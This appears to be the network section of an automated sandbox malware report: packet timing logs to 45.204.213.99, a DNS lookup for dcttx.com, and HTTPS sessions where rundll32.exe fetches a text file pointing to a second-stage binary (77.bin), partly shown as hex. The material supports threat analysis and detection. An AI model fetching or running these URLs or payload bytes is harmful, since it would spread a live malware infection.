                      Dec 22, 2024 09:17:14.535265923 CET76774973945.204.213.99192.168.2.4
                      Dec 22, 2024 09:17:14.537142992 CET497397677192.168.2.445.204.213.99
                      Dec 22, 2024 09:17:14.560085058 CET76774973945.204.213.99192.168.2.4
                      Dec 22, 2024 09:17:14.560220957 CET76774973945.204.213.99192.168.2.4
                      Dec 22, 2024 09:17:14.560323954 CET497397677192.168.2.445.204.213.99
                      Dec 22, 2024 09:17:14.561515093 CET76774973945.204.213.99192.168.2.4
                      Dec 22, 2024 09:17:14.561549902 CET76774973945.204.213.99192.168.2.4
                      Dec 22, 2024 09:17:14.563100100 CET497397677192.168.2.445.204.213.99
                      Dec 22, 2024 09:17:15.599562883 CET76774974245.204.213.99192.168.2.4
                      Dec 22, 2024 09:17:15.601196051 CET497447677192.168.2.445.204.213.99
                      Dec 22, 2024 09:17:15.647017002 CET497427677192.168.2.445.204.213.99
                      Dec 22, 2024 09:17:15.720776081 CET76774974445.204.213.99192.168.2.4
                      Dec 22, 2024 09:17:15.721000910 CET497447677192.168.2.445.204.213.99
                      Dec 22, 2024 09:17:16.699028015 CET497467677192.168.2.445.204.213.99
                      Dec 22, 2024 09:17:16.818562031 CET76774974645.204.213.99192.168.2.4
                      Dec 22, 2024 09:17:16.818643093 CET497467677192.168.2.445.204.213.99
                      Dec 22, 2024 09:17:17.580988884 CET497397677192.168.2.445.204.213.99
                      Dec 22, 2024 09:17:18.643940926 CET497427677192.168.2.445.204.213.99
                      Dec 22, 2024 09:17:21.564062119 CET497447677192.168.2.445.204.213.99
                      Dec 22, 2024 09:17:21.683701038 CET76774974445.204.213.99192.168.2.4
                      Dec 22, 2024 09:17:21.683725119 CET76774974445.204.213.99192.168.2.4
                      Dec 22, 2024 09:17:21.683777094 CET76774974445.204.213.99192.168.2.4
                      Dec 22, 2024 09:17:21.684210062 CET76774974445.204.213.99192.168.2.4
                      Dec 22, 2024 09:17:22.330218077 CET76774974445.204.213.99192.168.2.4
                      Dec 22, 2024 09:17:22.331712008 CET497447677192.168.2.445.204.213.99
                      Dec 22, 2024 09:17:22.451119900 CET76774974445.204.213.99192.168.2.4
                      Dec 22, 2024 09:17:24.907358885 CET497467677192.168.2.445.204.213.99
                      Dec 22, 2024 09:17:25.026906013 CET76774974645.204.213.99192.168.2.4
                      Dec 22, 2024 09:17:25.026926994 CET76774974645.204.213.99192.168.2.4
                      Dec 22, 2024 09:17:25.026949883 CET76774974645.204.213.99192.168.2.4
                      Dec 22, 2024 09:17:25.027038097 CET76774974645.204.213.99192.168.2.4
                      Dec 22, 2024 09:17:25.452379942 CET76774974645.204.213.99192.168.2.4
                      Dec 22, 2024 09:17:25.455373049 CET497467677192.168.2.445.204.213.99
                      Dec 22, 2024 09:17:25.574986935 CET76774974645.204.213.99192.168.2.4
                      Dec 22, 2024 09:17:33.441436052 CET497447677192.168.2.445.204.213.99
                      Dec 22, 2024 09:17:33.561007023 CET76774974445.204.213.99192.168.2.4
                      Dec 22, 2024 09:17:33.984132051 CET76774974445.204.213.99192.168.2.4
                      Dec 22, 2024 09:17:34.004086971 CET497467677192.168.2.445.204.213.99
                      Dec 22, 2024 09:17:34.030920029 CET497447677192.168.2.445.204.213.99
                      Dec 22, 2024 09:17:34.123611927 CET76774974645.204.213.99192.168.2.4
                      Dec 22, 2024 09:17:34.150475025 CET76774974445.204.213.99192.168.2.4
                      Dec 22, 2024 09:17:34.542332888 CET76774974645.204.213.99192.168.2.4
                      Dec 22, 2024 09:17:34.598495007 CET497467677192.168.2.445.204.213.99
                      Dec 22, 2024 09:17:34.605638027 CET497467677192.168.2.445.204.213.99
                      Dec 22, 2024 09:17:34.725425005 CET76774974645.204.213.99192.168.2.4
                      Dec 22, 2024 09:17:50.284372091 CET497447677192.168.2.445.204.213.99
                      Dec 22, 2024 09:17:50.404068947 CET76774974445.204.213.99192.168.2.4
                      Dec 22, 2024 09:17:50.817452908 CET76774974445.204.213.99192.168.2.4
                      Dec 22, 2024 09:17:50.829711914 CET497467677192.168.2.445.204.213.99
                      Dec 22, 2024 09:17:50.860855103 CET497447677192.168.2.445.204.213.99
                      Dec 22, 2024 09:17:50.899173021 CET497447677192.168.2.445.204.213.99
                      Dec 22, 2024 09:17:50.949382067 CET76774974645.204.213.99192.168.2.4
                      Dec 22, 2024 09:17:51.019783020 CET76774974445.204.213.99192.168.2.4
                      Dec 22, 2024 09:17:51.368311882 CET76774974645.204.213.99192.168.2.4
                      Dec 22, 2024 09:17:51.409778118 CET497467677192.168.2.445.204.213.99
                      Dec 22, 2024 09:17:51.532816887 CET497467677192.168.2.445.204.213.99
                      Dec 22, 2024 09:17:51.652383089 CET76774974645.204.213.99192.168.2.4
                      Dec 22, 2024 09:18:06.745296001 CET497447677192.168.2.445.204.213.99
                      Dec 22, 2024 09:18:06.864784956 CET76774974445.204.213.99192.168.2.4
                      Dec 22, 2024 09:18:07.278340101 CET76774974445.204.213.99192.168.2.4
                      Dec 22, 2024 09:18:07.292623043 CET497467677192.168.2.445.204.213.99
                      Dec 22, 2024 09:18:07.323754072 CET497447677192.168.2.445.204.213.99
                      Dec 22, 2024 09:18:07.392442942 CET497447677192.168.2.445.204.213.99
                      Dec 22, 2024 09:18:07.412295103 CET76774974645.204.213.99192.168.2.4
                      Dec 22, 2024 09:18:07.512006044 CET76774974445.204.213.99192.168.2.4
                      Dec 22, 2024 09:18:07.840954065 CET76774974645.204.213.99192.168.2.4
                      Dec 22, 2024 09:18:07.886172056 CET497467677192.168.2.445.204.213.99
                      Dec 22, 2024 09:18:07.940499067 CET497467677192.168.2.445.204.213.99
                      Dec 22, 2024 09:18:08.060084105 CET76774974645.204.213.99192.168.2.4
                      Dec 22, 2024 09:18:23.375668049 CET497447677192.168.2.445.204.213.99
                      Dec 22, 2024 09:18:23.495172024 CET76774974445.204.213.99192.168.2.4
                      Dec 22, 2024 09:18:23.908977032 CET76774974445.204.213.99192.168.2.4
                      Dec 22, 2024 09:18:23.960105896 CET497467677192.168.2.445.204.213.99
                      Dec 22, 2024 09:18:24.066423893 CET497447677192.168.2.445.204.213.99
                      Dec 22, 2024 09:18:24.079684973 CET76774974645.204.213.99192.168.2.4
                      Dec 22, 2024 09:18:24.101036072 CET497447677192.168.2.445.204.213.99
                      Dec 22, 2024 09:18:24.220601082 CET76774974445.204.213.99192.168.2.4
                      Dec 22, 2024 09:18:24.498269081 CET76774974645.204.213.99192.168.2.4
                      Dec 22, 2024 09:18:24.625720024 CET497467677192.168.2.445.204.213.99
                      Dec 22, 2024 09:18:24.711860895 CET497467677192.168.2.445.204.213.99
                      Dec 22, 2024 09:18:24.831489086 CET76774974645.204.213.99192.168.2.4
                      Dec 22, 2024 09:18:39.575300932 CET497447677192.168.2.445.204.213.99
                      Dec 22, 2024 09:18:39.695411921 CET76774974445.204.213.99192.168.2.4
                      Dec 22, 2024 09:18:40.109041929 CET76774974445.204.213.99192.168.2.4
                      Dec 22, 2024 09:18:40.205979109 CET497467677192.168.2.445.204.213.99
                      Dec 22, 2024 09:18:40.205979109 CET497467677192.168.2.445.204.213.99
                      Dec 22, 2024 09:18:40.237035990 CET497447677192.168.2.445.204.213.99
                      Dec 22, 2024 09:18:40.325529099 CET76774974645.204.213.99192.168.2.4
                      Dec 22, 2024 09:18:40.326066971 CET497467677192.168.2.445.204.213.99
                      Dec 22, 2024 09:18:40.815222025 CET497447677192.168.2.445.204.213.99
                      Dec 22, 2024 09:18:40.934892893 CET76774974445.204.213.99192.168.2.4
                      Dec 22, 2024 09:18:42.113588095 CET498567688192.168.2.445.204.213.99
                      Dec 22, 2024 09:18:42.233071089 CET76884985645.204.213.99192.168.2.4
                      Dec 22, 2024 09:18:42.233170033 CET498567688192.168.2.445.204.213.99
                      Dec 22, 2024 09:18:48.370110989 CET498567688192.168.2.445.204.213.99
                      Dec 22, 2024 09:18:48.489640951 CET76884985645.204.213.99192.168.2.4
                      Dec 22, 2024 09:18:48.489656925 CET76884985645.204.213.99192.168.2.4
                      Dec 22, 2024 09:18:48.489696980 CET76884985645.204.213.99192.168.2.4
                      Dec 22, 2024 09:18:48.489747047 CET76884985645.204.213.99192.168.2.4
                      Dec 22, 2024 09:18:48.913489103 CET76884985645.204.213.99192.168.2.4
                      Dec 22, 2024 09:18:48.913734913 CET498567688192.168.2.445.204.213.99
                      Dec 22, 2024 09:18:49.033236980 CET76884985645.204.213.99192.168.2.4
                      Dec 22, 2024 09:18:58.231446028 CET497447677192.168.2.445.204.213.99
                      Dec 22, 2024 09:18:58.350965023 CET76774974445.204.213.99192.168.2.4
                      Dec 22, 2024 09:18:58.765363932 CET76774974445.204.213.99192.168.2.4
                      Dec 22, 2024 09:18:58.877226114 CET497447677192.168.2.445.204.213.99
                      Dec 22, 2024 09:18:59.024177074 CET497447677192.168.2.445.204.213.99
                      Dec 22, 2024 09:18:59.143747091 CET76774974445.204.213.99192.168.2.4
                      Dec 22, 2024 09:19:00.888030052 CET498567688192.168.2.445.204.213.99
                      Dec 22, 2024 09:19:01.007658005 CET76884985645.204.213.99192.168.2.4
                      Dec 22, 2024 09:19:01.423916101 CET76884985645.204.213.99192.168.2.4
                      Dec 22, 2024 09:19:01.638256073 CET498567688192.168.2.445.204.213.99
                      Dec 22, 2024 09:19:01.664650917 CET498567688192.168.2.445.204.213.99
                      Dec 22, 2024 09:19:01.784540892 CET76884985645.204.213.99192.168.2.4
                      Dec 22, 2024 09:19:14.968117952 CET497447677192.168.2.445.204.213.99
                      Dec 22, 2024 09:19:14.968182087 CET497447677192.168.2.445.204.213.99
                      Dec 22, 2024 09:19:15.087630033 CET76774974445.204.213.99192.168.2.4
                      Dec 22, 2024 09:19:15.087680101 CET497447677192.168.2.445.204.213.99
                      Dec 22, 2024 09:19:16.910258055 CET499337688192.168.2.445.204.213.99
                      Dec 22, 2024 09:19:17.029803991 CET76884993345.204.213.99192.168.2.4
                      Dec 22, 2024 09:19:17.029879093 CET499337688192.168.2.445.204.213.99
                      Dec 22, 2024 09:19:18.246073961 CET498567688192.168.2.445.204.213.99
                      Dec 22, 2024 09:19:18.366240025 CET76884985645.204.213.99192.168.2.4
                      Dec 22, 2024 09:19:18.782437086 CET76884985645.204.213.99192.168.2.4
                      Dec 22, 2024 09:19:18.917577028 CET498567688192.168.2.445.204.213.99
                      Dec 22, 2024 09:19:19.037183046 CET76884985645.204.213.99192.168.2.4
                      Dec 22, 2024 09:19:22.339710951 CET499337688192.168.2.445.204.213.99
                      Dec 22, 2024 09:19:22.459525108 CET76884993345.204.213.99192.168.2.4
                      Dec 22, 2024 09:19:22.459707975 CET76884993345.204.213.99192.168.2.4
                      Dec 22, 2024 09:19:22.459738016 CET76884993345.204.213.99192.168.2.4
                      Dec 22, 2024 09:19:22.459769011 CET76884993345.204.213.99192.168.2.4
                      Dec 22, 2024 09:19:23.113610983 CET76884993345.204.213.99192.168.2.4
                      Dec 22, 2024 09:19:23.113924026 CET499337688192.168.2.445.204.213.99
                      Dec 22, 2024 09:19:23.233541965 CET76884993345.204.213.99192.168.2.4
                      Dec 22, 2024 09:19:34.451746941 CET499337688192.168.2.445.204.213.99
                      Dec 22, 2024 09:19:34.451746941 CET499337688192.168.2.445.204.213.99
                      Dec 22, 2024 09:19:34.571584940 CET76884993345.204.213.99192.168.2.4
                      Dec 22, 2024 09:19:34.571681023 CET499337688192.168.2.445.204.213.99
                      Dec 22, 2024 09:19:35.655184031 CET498567688192.168.2.445.204.213.99
                      Dec 22, 2024 09:19:35.655230999 CET498567688192.168.2.445.204.213.99
                      Dec 22, 2024 09:19:35.774914026 CET76884985645.204.213.99192.168.2.4
                      Dec 22, 2024 09:19:35.774991989 CET498567688192.168.2.445.204.213.99
                      Dec 22, 2024 09:19:36.377522945 CET499777677192.168.2.445.204.213.99
                      Dec 22, 2024 09:19:36.497329950 CET76774997745.204.213.99192.168.2.4
                      Dec 22, 2024 09:19:36.497445107 CET499777677192.168.2.445.204.213.99
                      Dec 22, 2024 09:19:37.578763962 CET499827677192.168.2.445.204.213.99
                      Dec 22, 2024 09:19:37.698345900 CET76774998245.204.213.99192.168.2.4
                      Dec 22, 2024 09:19:37.698415995 CET499827677192.168.2.445.204.213.99
                      Dec 22, 2024 09:19:42.199419975 CET499777677192.168.2.445.204.213.99
                      Dec 22, 2024 09:19:42.319152117 CET76774997745.204.213.99192.168.2.4
                      Dec 22, 2024 09:19:42.319478989 CET76774997745.204.213.99192.168.2.4
                      Dec 22, 2024 09:19:42.319533110 CET76774997745.204.213.99192.168.2.4
                      Dec 22, 2024 09:19:42.319586039 CET76774997745.204.213.99192.168.2.4
                      Dec 22, 2024 09:19:42.745697021 CET76774997745.204.213.99192.168.2.4
                      Dec 22, 2024 09:19:42.748019934 CET499777677192.168.2.445.204.213.99
                      Dec 22, 2024 09:19:42.867795944 CET76774997745.204.213.99192.168.2.4
                      Dec 22, 2024 09:19:43.684731007 CET499827677192.168.2.445.204.213.99
                      Dec 22, 2024 09:19:43.804482937 CET76774998245.204.213.99192.168.2.4
                      Dec 22, 2024 09:19:43.804570913 CET76774998245.204.213.99192.168.2.4
                      Dec 22, 2024 09:19:43.804600954 CET76774998245.204.213.99192.168.2.4
                      Dec 22, 2024 09:19:43.804635048 CET76774998245.204.213.99192.168.2.4
                      Dec 22, 2024 09:19:44.227494001 CET76774998245.204.213.99192.168.2.4
                      Dec 22, 2024 09:19:44.227792978 CET499827677192.168.2.445.204.213.99
                      Dec 22, 2024 09:19:44.347460985 CET76774998245.204.213.99192.168.2.4
                      Dec 22, 2024 09:19:52.900549889 CET499777677192.168.2.445.204.213.99
                      Dec 22, 2024 09:19:52.900593042 CET499777677192.168.2.445.204.213.99
                      Dec 22, 2024 09:19:53.347374916 CET76774997745.204.213.99192.168.2.4
                      Dec 22, 2024 09:19:53.347436905 CET499777677192.168.2.445.204.213.99
                      Dec 22, 2024 09:19:54.119555950 CET499827677192.168.2.445.204.213.99
                      Dec 22, 2024 09:19:54.119555950 CET499827677192.168.2.445.204.213.99
                      Dec 22, 2024 09:19:54.239084005 CET76774998245.204.213.99192.168.2.4
                      Dec 22, 2024 09:19:54.239649057 CET499827677192.168.2.445.204.213.99
                      Dec 22, 2024 09:19:54.823568106 CET500197688192.168.2.445.204.213.99
                      Dec 22, 2024 09:19:54.943120956 CET76885001945.204.213.99192.168.2.4
                      Dec 22, 2024 09:19:54.943207026 CET500197688192.168.2.445.204.213.99
                      Dec 22, 2024 09:19:56.045583010 CET500227688192.168.2.445.204.213.99
                      Dec 22, 2024 09:19:56.165199995 CET76885002245.204.213.99192.168.2.4
                      Dec 22, 2024 09:19:56.165363073 CET500227688192.168.2.445.204.213.99
                      Dec 22, 2024 09:20:00.233587980 CET500197688192.168.2.445.204.213.99
                      Dec 22, 2024 09:20:00.354206085 CET76885001945.204.213.99192.168.2.4
                      Dec 22, 2024 09:20:00.354324102 CET76885001945.204.213.99192.168.2.4
                      Dec 22, 2024 09:20:00.354335070 CET76885001945.204.213.99192.168.2.4
                      Dec 22, 2024 09:20:00.354473114 CET76885001945.204.213.99192.168.2.4
                      Dec 22, 2024 09:20:00.992295980 CET76885001945.204.213.99192.168.2.4
                      Dec 22, 2024 09:20:00.992656946 CET500197688192.168.2.445.204.213.99
                      Dec 22, 2024 09:20:01.112492085 CET76885001945.204.213.99192.168.2.4
                      Dec 22, 2024 09:20:02.401973963 CET500227688192.168.2.445.204.213.99
                      Dec 22, 2024 09:20:02.521760941 CET76885002245.204.213.99192.168.2.4
                      Dec 22, 2024 09:20:02.521828890 CET76885002245.204.213.99192.168.2.4
                      Dec 22, 2024 09:20:02.521851063 CET76885002245.204.213.99192.168.2.4
                      Dec 22, 2024 09:20:02.521961927 CET76885002245.204.213.99192.168.2.4
                      Dec 22, 2024 09:20:02.943396091 CET76885002245.204.213.99192.168.2.4
                      Dec 22, 2024 09:20:02.943622112 CET500227688192.168.2.445.204.213.99
                      Dec 22, 2024 09:20:03.063195944 CET76885002245.204.213.99192.168.2.4
                      Dec 22, 2024 09:20:11.874820948 CET500197688192.168.2.445.204.213.99
                      Dec 22, 2024 09:20:11.874923944 CET500197688192.168.2.445.204.213.99
                      Dec 22, 2024 09:20:11.994940042 CET76885001945.204.213.99192.168.2.4
                      Dec 22, 2024 09:20:11.998563051 CET500197688192.168.2.445.204.213.99
                      Dec 22, 2024 09:20:13.094048977 CET500227688192.168.2.445.204.213.99
                      Dec 22, 2024 09:20:13.094156027 CET500227688192.168.2.445.204.213.99
                      Dec 22, 2024 09:20:13.213752985 CET76885002245.204.213.99192.168.2.4
                      Dec 22, 2024 09:20:13.213927031 CET500227688192.168.2.445.204.213.99
                      Dec 22, 2024 09:20:13.782275915 CET500277677192.168.2.445.204.213.99
                      Dec 22, 2024 09:20:13.901997089 CET76775002745.204.213.99192.168.2.4
                      Dec 22, 2024 09:20:13.902100086 CET500277677192.168.2.445.204.213.99
                      Dec 22, 2024 09:20:15.017168999 CET500287677192.168.2.445.204.213.99
                      Dec 22, 2024 09:20:15.136888981 CET76775002845.204.213.99192.168.2.4
                      Dec 22, 2024 09:20:15.136977911 CET500287677192.168.2.445.204.213.99
                      Dec 22, 2024 09:20:19.944438934 CET500277677192.168.2.445.204.213.99
                      Dec 22, 2024 09:20:20.064306021 CET76775002745.204.213.99192.168.2.4
                      Dec 22, 2024 09:20:20.064317942 CET76775002745.204.213.99192.168.2.4
                      Dec 22, 2024 09:20:20.064368010 CET76775002745.204.213.99192.168.2.4
                      Dec 22, 2024 09:20:20.064428091 CET76775002745.204.213.99192.168.2.4
                      Dec 22, 2024 09:20:20.496221066 CET76775002745.204.213.99192.168.2.4
                      Dec 22, 2024 09:20:20.497945070 CET500277677192.168.2.445.204.213.99
                      Dec 22, 2024 09:20:20.617515087 CET76775002745.204.213.99192.168.2.4
                      Dec 22, 2024 09:20:20.799761057 CET500287677192.168.2.445.204.213.99
                      Dec 22, 2024 09:20:20.919507027 CET76775002845.204.213.99192.168.2.4
                      Dec 22, 2024 09:20:20.919517994 CET76775002845.204.213.99192.168.2.4
                      Dec 22, 2024 09:20:20.919636965 CET76775002845.204.213.99192.168.2.4
                      Dec 22, 2024 09:20:20.919646025 CET76775002845.204.213.99192.168.2.4
                      Dec 22, 2024 09:20:21.338316917 CET76775002845.204.213.99192.168.2.4
                      Dec 22, 2024 09:20:21.339446068 CET500287677192.168.2.445.204.213.99
                      Dec 22, 2024 09:20:21.459058046 CET76775002845.204.213.99192.168.2.4
                      Dec 22, 2024 09:20:30.773649931 CET500277677192.168.2.445.204.213.99
                      Dec 22, 2024 09:20:30.773746967 CET500277677192.168.2.445.204.213.99
                      Dec 22, 2024 09:20:30.893271923 CET76775002745.204.213.99192.168.2.4
                      Dec 22, 2024 09:20:30.893421888 CET500277677192.168.2.445.204.213.99
                      Dec 22, 2024 09:20:31.995695114 CET500287677192.168.2.445.204.213.99
                      Dec 22, 2024 09:20:32.115537882 CET76775002845.204.213.99192.168.2.4
                      Dec 22, 2024 09:20:32.528654099 CET76775002845.204.213.99192.168.2.4
                      Dec 22, 2024 09:20:32.649399996 CET500287677192.168.2.445.204.213.99
                      Dec 22, 2024 09:20:32.722620964 CET500297688192.168.2.445.204.213.99
                      Dec 22, 2024 09:20:32.842219114 CET76885002945.204.213.99192.168.2.4
                      Dec 22, 2024 09:20:32.842437983 CET500297688192.168.2.445.204.213.99
                      Dec 22, 2024 09:20:33.167501926 CET500287677192.168.2.445.204.213.99
                      Dec 22, 2024 09:20:33.287106991 CET76775002845.204.213.99192.168.2.4
                      Dec 22, 2024 09:20:38.379674911 CET500297688192.168.2.445.204.213.99
                      Dec 22, 2024 09:20:38.499288082 CET76885002945.204.213.99192.168.2.4
                      Dec 22, 2024 09:20:38.499304056 CET76885002945.204.213.99192.168.2.4
                      Dec 22, 2024 09:20:38.499339104 CET76885002945.204.213.99192.168.2.4
                      Dec 22, 2024 09:20:38.499464035 CET76885002945.204.213.99192.168.2.4
                      Dec 22, 2024 09:20:39.138104916 CET76885002945.204.213.99192.168.2.4
                      Dec 22, 2024 09:20:39.138406038 CET500297688192.168.2.445.204.213.99
                      Dec 22, 2024 09:20:39.258054018 CET76885002945.204.213.99192.168.2.4
                      Dec 22, 2024 09:20:48.805044889 CET500287677192.168.2.445.204.213.99
                      Dec 22, 2024 09:20:48.925120115 CET76775002845.204.213.99192.168.2.4
                      Dec 22, 2024 09:20:49.338722944 CET76775002845.204.213.99192.168.2.4
                      Dec 22, 2024 09:20:49.428385973 CET500287677192.168.2.445.204.213.99
                      Dec 22, 2024 09:20:49.545037985 CET500297688192.168.2.445.204.213.99
                      Dec 22, 2024 09:20:49.545087099 CET500297688192.168.2.445.204.213.99
                      Dec 22, 2024 09:20:49.548139095 CET76775002845.204.213.99192.168.2.4
                      Dec 22, 2024 09:20:49.664638996 CET76885002945.204.213.99192.168.2.4
                      Dec 22, 2024 09:20:49.664717913 CET500297688192.168.2.445.204.213.99
                      Dec 22, 2024 09:20:51.478385925 CET500307677192.168.2.445.204.213.99
                      Dec 22, 2024 09:20:51.598036051 CET76775003045.204.213.99192.168.2.4
                      Dec 22, 2024 09:20:51.598222017 CET500307677192.168.2.445.204.213.99
                      Dec 22, 2024 09:20:57.569498062 CET500307677192.168.2.445.204.213.99
                      Dec 22, 2024 09:20:57.689536095 CET76775003045.204.213.99192.168.2.4
                      Dec 22, 2024 09:20:57.689547062 CET76775003045.204.213.99192.168.2.4
                      Dec 22, 2024 09:20:57.689621925 CET76775003045.204.213.99192.168.2.4
                      Dec 22, 2024 09:20:57.689713955 CET76775003045.204.213.99192.168.2.4
                      Dec 22, 2024 09:20:58.341993093 CET76775003045.204.213.99192.168.2.4
                      Dec 22, 2024 09:20:58.342263937 CET500307677192.168.2.445.204.213.99
                      Dec 22, 2024 09:20:58.461774111 CET76775003045.204.213.99192.168.2.4
                      Dec 22, 2024 09:21:05.952452898 CET500287677192.168.2.445.204.213.99
                      Dec 22, 2024 09:21:05.952538967 CET500287677192.168.2.445.204.213.99
                      Dec 22, 2024 09:21:06.072712898 CET76775002845.204.213.99192.168.2.4
                      Dec 22, 2024 09:21:06.073883057 CET500287677192.168.2.445.204.213.99
                      Dec 22, 2024 09:21:07.891236067 CET500317688192.168.2.445.204.213.99
                      Dec 22, 2024 09:21:08.010864973 CET76885003145.204.213.99192.168.2.4
                      Dec 22, 2024 09:21:08.014429092 CET500317688192.168.2.445.204.213.99
                      Dec 22, 2024 09:21:09.047410011 CET500307677192.168.2.445.204.213.99
                      Dec 22, 2024 09:21:09.167092085 CET76775003045.204.213.99192.168.2.4
                      Dec 22, 2024 09:21:09.586335897 CET76775003045.204.213.99192.168.2.4
                      Dec 22, 2024 09:21:09.629959106 CET500307677192.168.2.445.204.213.99
                      Dec 22, 2024 09:21:09.662069082 CET500307677192.168.2.445.204.213.99
                      Dec 22, 2024 09:21:09.781661987 CET76775003045.204.213.99192.168.2.4
                      TimestampSource PortDest PortSource IPDest IP
                      Dec 22, 2024 09:17:03.324636936 CET5303453192.168.2.41.1.1.1
                      Dec 22, 2024 09:17:03.654346943 CET53530341.1.1.1192.168.2.4
                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                      Dec 22, 2024 09:17:03.324636936 CET192.168.2.41.1.1.10x1169Standard query (0)dcttx.comA (IP address)IN (0x0001)false
                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                      Dec 22, 2024 09:17:03.654346943 CET1.1.1.1192.168.2.40x1169No error (0)dcttx.com38.147.186.138A (IP address)IN (0x0001)false
                      • dcttx.com
                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      0192.168.2.44973338.147.186.1384437544C:\Windows\SysWOW64\rundll32.exe
                      TimestampBytes transferredDirectionData
                      2024-12-22 08:17:05 UTC56OUTGET /19/7.txt HTTP/1.1
                      accept: */*
                      host: dcttx.com
                      2024-12-22 08:17:06 UTC270INHTTP/1.1 200 OK
                      Server: nginx
                      Date: Sun, 22 Dec 2024 08:17:05 GMT
                      Content-Type: text/plain
                      Content-Length: 27
                      Last-Modified: Thu, 19 Dec 2024 15:28:55 GMT
                      Connection: close
                      ETag: "67643bb7-1b"
                      Strict-Transport-Security: max-age=31536000
                      Accept-Ranges: bytes
                      2024-12-22 08:17:06 UTC27INData Raw: 68 74 74 70 73 3a 2f 2f 64 63 74 74 78 2e 63 6f 6d 2f 31 39 2f 37 37 2e 62 69 6e
                      Data Ascii: https://dcttx.com/19/77.bin


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      1192.168.2.44973238.147.186.1384437560C:\Windows\SysWOW64\rundll32.exe
                      TimestampBytes transferredDirectionData
                      2024-12-22 08:17:05 UTC56OUTGET /19/7.txt HTTP/1.1
                      accept: */*
                      host: dcttx.com
                      2024-12-22 08:17:06 UTC270INHTTP/1.1 200 OK
                      Server: nginx
                      Date: Sun, 22 Dec 2024 08:17:05 GMT
                      Content-Type: text/plain
                      Content-Length: 27
                      Last-Modified: Thu, 19 Dec 2024 15:28:55 GMT
                      Connection: close
                      ETag: "67643bb7-1b"
                      Strict-Transport-Security: max-age=31536000
                      Accept-Ranges: bytes
                      2024-12-22 08:17:06 UTC27INData Raw: 68 74 74 70 73 3a 2f 2f 64 63 74 74 78 2e 63 6f 6d 2f 31 39 2f 37 37 2e 62 69 6e
                      Data Ascii: https://dcttx.com/19/77.bin


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      2192.168.2.44973438.147.186.1384437560C:\Windows\SysWOW64\rundll32.exe
                      TimestampBytes transferredDirectionData
                      2024-12-22 08:17:07 UTC57OUTGET /19/77.bin HTTP/1.1
                      accept: */*
                      host: dcttx.com
                      2024-12-22 08:17:08 UTC291INHTTP/1.1 200 OK
                      Server: nginx
                      Date: Sun, 22 Dec 2024 08:17:08 GMT
                      Content-Type: application/octet-stream
                      Content-Length: 140288
                      Last-Modified: Thu, 19 Dec 2024 15:27:56 GMT
                      Connection: close
                      ETag: "67643b7c-22400"
                      Strict-Transport-Security: max-age=31536000
                      Accept-Ranges: bytes
                      2024-12-22 08:17:08 UTC16093INData Raw: 4d 5a 45 52 e8 00 00 00 00 58 83 e8 09 50 05 00 20 02 00 ff d0 c3 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 e2 0c 41 1d a6 6d 2f 4e a6 6d 2f 4e a6 6d 2f 4e c9 1b b1 4e b2 6d 2f 4e c9 1b 85 4e d0 6d 2f 4e c9 1b 84 4e 8a 6d 2f 4e af 15 bc 4e ad 6d 2f 4e a6 6d 2e 4e 29 6d 2f 4e c9 1b 80 4e ab 6d 2f 4e c9 1b b2 4e a7 6d 2f 4e 52 69 63 68 a6 6d 2f 4e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 74 12 b6 66 00 00 00 00 00 00 00 00 e0 00 02
                      Data Ascii: MZERXP @!L!This program cannot be run in DOS mode.$Am/Nm/Nm/NNm/NNm/NNm/NNm/Nm.N)m/NNm/NNm/NRichm/NPELtf
                      2024-12-22 08:17:08 UTC16384INData Raw: 08 89 4b 04 89 9e 80 01 00 00 ff 86 78 01 00 00 57 89 9e 7c 01 00 00 ff 15 24 50 41 00 b8 01 00 00 00 5f 5b 8b e5 5d c3 b9 01 00 00 00 53 8d be 98 00 00 00 89 4e 30 c7 46 34 03 00 00 00 89 46 38 89 4e 3c e8 5a d5 ff ff 85 c0 75 0d 8b 13 53 50 8b 02 50 ff 15 e4 50 41 00 5f 33 c0 5b 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 53 56 57 8b f0 ff 15 4c 50 41 00 8b d8 8b 46 64 83 f8 03 0f 84 cf 00 00 00 8d be 5c 01 00 00 57 e8 0b ec ff ff 8b 4e 64 83 f9 01 74 0b 8b 56 64 85 d2 0f 85 aa 00 00 00 c7 46 64 02 00 00 00 c7 07 00 00 00 00 8b c3 e8 b4 01 00 00 8b 46 60 85 c0 74 20 83 7e 3c 00 74 13 8b 4e 40 6a 00 6a 10 68 40 74 41 00 51 ff 15 f4 51 41 00 c7 46 60 00 00 00 00 83 7e 30 00 74 22 8b 56 48 52 e8 7e ec ff ff 8b 46 04 83 c4 04 50 ff 15 38
                      Data Ascii: KxW|$PA_[]SN0F4F8N<ZuSPPPA_3[]SVWLPAFd\WNdtVdFdF`t ~<tN@jjh@tAQQAF`~0t"VHR~FP8
